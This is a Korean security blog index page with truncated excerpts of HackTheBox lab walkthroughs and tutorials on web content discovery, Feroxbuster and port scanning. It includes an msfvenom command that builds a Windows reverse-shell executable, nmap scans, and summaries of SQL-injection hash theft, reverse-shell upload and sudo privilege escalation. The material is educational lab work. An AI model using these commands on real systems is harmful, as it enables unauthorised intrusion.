반응형

모의해킹 10

[모의 해킹] HackTheBox - Giddy Part 2

Giddy OS: Windows취약점: 취약한 서비스 권한 설정과 PowerShell 히스토리 파일 PowerShell 히스토리 파일에 기록된 정보를 기반으로 서비스를 조작해 악성 파일을 실행할 수 있다. 리버스쉘원할한 작업을 위해서 Evil-WinRM 세션에서 새로운 리버스쉘을 업로드 하자. msfvenom을 사용해서 윈도우용 TCP 기반 리버스쉘을 제작할 수 있다.┌─[✗]─[solo@parrot]─[~/Desktop/hack]└──╼ $msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.108 LPORT=8000 -f exe -o reverse.exe*Evil-WinRM* PS C:\Users\Stacy\Documents> Invoke-WebReq..

[모의 해킹] HackTheBox - Giddy Part 1

GiddyOS: Windows취약점: SQL Injection, LLMNR Poisoning MS SQL Server를 데이터베이스로 사용하는 ASP.NET 기반 웹 어플리케이션이 돌아가는 머신이다. SQL Injection을 통해 MS SQL의 Stored Procedure인 xp_dirtree를 사용할 수 있다. xp_dirtree를 사용해 공격자에게 NTLM Hash를 전송하고 전송된 NTLM Hash를 크랙해 사용자 계정 비밀번호를 획득할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.10.10.104PORT     STATE SERVICE80/tcp   open  http443/tcp  open  https3389/tcp open  ms-wbt-server5..

[해킹툴] Feroxbuster - 고성능 웹 컨텐츠 탐색 툴

FeroxbusterFeroxbuster는 웹사이트 탐색에 사용할 수 있는 웹 컨텐츠 탐색 툴이다. Feroxbuster 말고도 Gobuster, Dirbuster, Dirb 등 아주 많은 웹 컨텐츠 탐색 툴을 검색하면 쉽게 찾을 수 있다. Feroxbuster는 다른 웹 컨텐츠 탐색 툴에 꿇리지 않을만큼 다양한 기능을 지원하고 무엇보다 체감상 속도가 다른 툴들보다 월등히 빨랐기 웹 컨텐츠 탐색 툴이 필요하다면 Feroxbuster를 추천한다. Feroxbuster를 사용하기 앞서 raft-medium-directories.txt 같이 웹 컨텐츠 탐색 wordlist를 준비하자. 탐색할 웹사이트 (http://bank.com) Feroxbuster를 사용해서 탐색을 진행할 웹사이트다. 물론 진짜 웹사이트..

해킹툴/웹 2025.03.17

[해킹 기법] 웹 컨텐츠 탐색 - 웹사이트 구조 파헤치기

웹해킹의 첫 단계웹해킹의 첫 단계는 무엇일까? 웹해킹을 하기 위해선 해킹하려는 웹사이트가 무슨 구조를 가지고 있고 어떻게 돌아가는지 파악해야 된다. 그리고 당연하게도 웹사이트 구조를 파악하기 위해선 웹사이트에 무슨 디렉토리와 파일이 존재하는지 확인해야 된다. 웹사이트의 디렉토리와 파일을 확인하는 해킹 기법, 그것이 바로 웹 컨탠츠 탐색 (Web Content Discovery)다. 웹 컨텐츠 탐색 (Web Content Discovery)웹 컨탠츠 탐색 (Web Content Discovery)은 웹사이트에 방대한 양의 디렉토리, 파일을 요청해서 받는 응답을 기반으로 웹사이트에 존재하는 디렉토리와 파일을 파악하는 해킹 기법이다. 이 과정에서 단순히 공개적으로 노출된 웹사이트의 디렉토리와 파일 뿐만이 아니..

해킹 기법/웹 2025.03.16

[모의 해킹] HackTheBox - Dog Part 2

DogOS: Linux취약점: 취약한 Sudo 설정 취약한 Sudo 권한으로 실행한 바이너리 파일이 리버스쉘을 생성하도록 유도해서 root 권한을 가진 쉘을 만들 수 있다. SSH┌─[✗]─[solo@parrot]─[~/Desktop/hack/note]└──╼ $ssh johncusack@10.10.11.58SSH로 johncusack 계정으로 로그인한다. SSH가 리버스쉘보다 안정적인 연결을 제공하기 때문에 작업하기 훨씬 수월하다. SSH로 성공적으로 로그인 했으면 사용자의 Sudo 권한을 확인해 보자. johncusack@dog:~$ sudo -l[sudo] password for johncusack: BackDropJ2024DS2024Matching Defaults entries for johncu..

모의 해킹/Linux 2025.03.15

[모의 해킹] HackTheBox - Dog Part 1

DogOS: Linux취약점: Arbitrary File Upload, Git Repository 노출 노출된 Git 리포지토리를 통해 Backdrop CMS 관리자 계정을 탈취할 수 있고, 해당 계정으로 PHP 리버스쉘을 업로드해서 접근할 수 있다. 포트 스캐닝nmap -Pn -sS -p- 10.10.11.58PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpnmap -Pn -sC -sV -p 22,80 10.10.11.58PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072..

모의 해킹/Linux 2025.03.15

[모의 해킹] HackTheBox - Querier Part 1

QuerierOS: Windows취약점: SMB 공유 풀더를 통한 민감 정보 유출 SMB 공유 풀더에 접근해서 파일을 다운로드하고 해당 파일의 vbascript에서 탈취한 계정으로 MS SQL Server를 조작해 리버스쉘을 획득해야 하는 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.10.10.125PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1433/tcp open ms-sql-s5985/tcp open wsman47001/tcp open winrm49664/tcp ..

[해킹 기법] 포트 스캐닝 - 목표 포착을 위한 해킹의 첫 단계

해킹을 하기 전엔 무엇을 먼저 해야될까?당연히 해킹을 하기 위해선 해킹해야 될 대상이 무엇인지 파악해야 된다. 자신의 목표가 무엇인지도 모른채 해킹을 하는건 마치 장님이 지팡이 없이 목표를 향해서 나아가는 것과 다를 바가 없다. 어디로 가야하오해킹의 목표가 무엇인지 파악하기 위한 첫 단계가 바로 포트 스캐닝이다. 네트워크 관리자나 서버 관리자가 갖춰야 될 덕목이기도 하다... 포트 스캐닝포트 스캐닝이란 어떠 포트가 열려있는지, 해당 포트가 TCP포트인지 UDP포트인지, 해당 포트에서 돌아가는 서버, 서비스, 프로토콜이 무엇인지 확인하는 작업이다. 포트에 대한 정보와 포트에서 돌아가는 서버, 서비스, 프로토콜 등의 정보가 있어야지 이와 관련된 잠재적인 취약점을 발견하고 악용할 수 있다. Nmap 같은 포트..

[모의 해킹] HackTheBox - Netmon

NetmonOS: Windows취약점: 취약한 FTP 설정 취약한 FTP 서버와 PRTG 네트워크 모니터링 소프트웨어가 설치된 윈도우 머신이다. 기본적인 FTP 취약점에 대한 지식과 구글링을 통해 얻을 수 있는 PTRG 설치 디렉토리 구조에 대한 정보를 활용해서 공략할 수 있는 비교적 쉬운 난이도의 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.129.230.176PORT STATE SERVICE21/tcp open ftp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds59..

[모의 해킹] HackTheBox - Knife

KnifeOS: Linux취약점: PHP 백도어, 취약한 Sudo 권한 설정 백도어가 있는 PHP 버전이 설치된 리눅스 머신이다.PHP 백도어를 활용해 타겟 머신에 접속하고 Sudo 권한으로 knife 바이너리를 통해 루트쉘을 얻어 공략할 수 있다. 포트 스캐닝 nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.10.10.242PORT STATE SERVICE22/tcp open ssh80/tcp open httpnmap -Pn -sC -sV -p 22,80 -oN SERVICE_SCAN 10.10.10.242PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubun..

모의 해킹/Linux 2025.03.09
반응형